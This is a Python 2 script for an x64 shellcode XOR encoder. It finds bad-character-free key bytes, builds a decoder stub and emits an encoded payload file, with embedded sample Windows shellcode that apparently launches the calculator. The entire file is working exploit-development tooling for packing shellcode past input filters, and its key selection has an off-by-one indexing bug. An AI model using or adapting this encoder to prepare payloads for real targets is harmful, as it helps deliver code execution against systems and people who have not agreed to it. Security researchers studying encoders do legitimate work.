#!/usr/bin/env python #Filename: Xor_QWORD_x64.py #coding=utf-8 import re import sys import random import struct class QWORDXorEncoder: def __init__(self): self.name = "x64 QWORD Xor Encoder" self.description = "x64 QWORD Xor shellcode encoder" self.author = "Danny__Wei" self.bad_chars = [] self.bad_keys = [[] for i in range(8)] self.good_keys = [[] for i in range(8)] self.final_keys = [] self.shellcode = "" self.encoded_shellcode = "" self.encoded_payload_length = 0 self.encoder_bad_chars = ["48", "31", "c9", "81", "e9", "8d", "05", "bb", "58", "27", "2d", "f8", "ff", "e2", "f4"] self.misc_comments = """ #This is the decoder stub "\x48\x31\xC9" + # xor rcx, rcx "\x48\x81\xE9" + block_count + # sub ecx, block_count "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0] "\x48\xBBXXXXXXXX" + # mov rbx, 0x???????????????? "\x48\x31\x58\x27" + # xor [rax+0x27], rbx "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8 "\xE2\xF4" # loop 0x1B """ def all_the_stats(self): print "\n[Output] Encoder Name:\n" + self.name string_bad_chars = '' for bchar in self.bad_chars: string_bad_chars += hex(bchar) + " " print "\n[Output] Bad Character(s):\n" + string_bad_chars print "\n[Output] Shellcode length:\n" + str(self.encoded_payload_length) j = 1; key = 0 for i in self.final_keys: key += i * j j *= 0x100 print ('\n[Output] Xor Key:\n%08X' % key) def shellcode_to_bin(self): hFile = file('Xor_x64_encoded.bin', 'wb+') hFile.write(self.encoded_shellcode) hFile.close() return def set_shellcode(self, shellcode): shellcode = shellcode.decode('string-escape') self.shellcode = bytearray(shellcode) return # This function was copied from Justin Warner (@sixdub) def set_bad_characters(self, bad_characters): final_bad_chars = [] bad_characters = bad_characters.split('x') # Do some validation on the received characters for item in bad_characters: if item == '': pass elif item in self.encoder_bad_chars: print "\n[Error] Encoder Error: Bad character specified is used for the decoder stub." print "[Error] Encoder Error: Please use different bad characters or another encoder!" sys.exit() else: if len(item) == 2: # Thanks rohan (@cptjesus) for providing this regex code, and making me too lazt # to do it myself rohan_re_code = re.compile('[a-f0-9]{2}',flags=re.IGNORECASE) if rohan_re_code.match(item): final_bad_chars.append(item) else: print "\n[Error] Bad Character Error: Invalid bad character detected." print "[Error] Bad Character Error: Please provide bad characters in \\x00\\x01... format." sys.exit() else: print "\n[Error] Bad Character Error: Invalid bad character detected." print "[Error] Bad Character Error: Please provide bad characters in \\x00\\x01... format." sys.exit() for x in final_bad_chars: self.bad_chars.append(int("0x"+x,16)) return def find_bad_keys(self): for key in range(0x100): for bad in self.bad_chars: char = key ^ bad for count in xrange(8): for i in xrange(count, len(self.shellcode), 8): if char == self.shellcode[i]: self.bad_keys[count].append(key) break return def find_key(self): for count in xrange(8): for key in range(0x100): if key not in self.bad_keys[count]: self.good_keys[count].append(key) for count in xrange(8): if len(self.good_keys[count]) == 0: print "\n[Error] Encoder Error: Can't find available keys." print "[Error] Encoder Error: Please use different bad characters or another encoder!" sys.exit() i = random.randint(0, len(self.good_keys[count])) self.final_keys.append(self.good_keys[count][i]) return def decoder_stub(self): block_count = -( ( (len(self.shellcode) - 1) / 8) + 1) str = struct.pack('<l', block_count) decoder = "\x48\x31\xC9" + "\x48\x81\xE9" + str + "\x48\x8D\x05\xEF\xFF\xFF\xFF" + "\x48\xBBXXXXXXXX" + "\x48\x31\x58\x27" + "\x48\x2D\xF8\xFF\xFF\xFF" + "\xE2\xF4" ''' decoder = "\x48\x31\xC9" + # xor rcx, rcx "\x48\x81\xE9" + block_count + # sub ecx, block_count "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0] "\x48\xBBXXXXXXXX" + # mov rbx, 0x???????????????? "\x48\x31\x58\x27" + # xor [rax+0x27], rbx "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8 "\xE2\xF4" # loop 0x1B ''' return decoder def do_encode(self): stub = self.decoder_stub() key = 0 str = '' for key in self.final_keys: str += struct.pack('B', key) stub = stub.replace('XXXXXXXX', str) # check out the final decoder stub for byte in bytearray(stub): if byte in self.bad_chars: print "\n[Error] Encoder Error: Bad character specified is used for the decoder stub." print "[Error] Encoder Error: Please use different bad characters or another encoder!" sys.exit() stub = bytearray(stub) mod = 0 byte = 0 count = 0 for byte in bytearray(self.shellcode): if count < 8: mod = count else: mod = count % 8 count += 1 enbyte = byte ^ self.final_keys[mod] stub.append(enbyte) self.encoded_shellcode = stub self.encoded_payload_length = len(stub) return def encode(self): self.find_bad_keys() self.find_key() self.do_encode() if __name__ == '__main__': shellcode = ( "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" "\x6F\x87\xFF\xD5\xBB\xF0\xB5\xA2\x56\x41\xBA\xA6\x95\xBD\x9D\xFF" "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5\x63\x61\x6C\x63\x00") shell = QWORDXorEncoder() shell.set_shellcode(shellcode) shell.set_bad_characters('x00x0a') shell.encode() shell.all_the_stats() shell.shellcode_to_bin() else: pass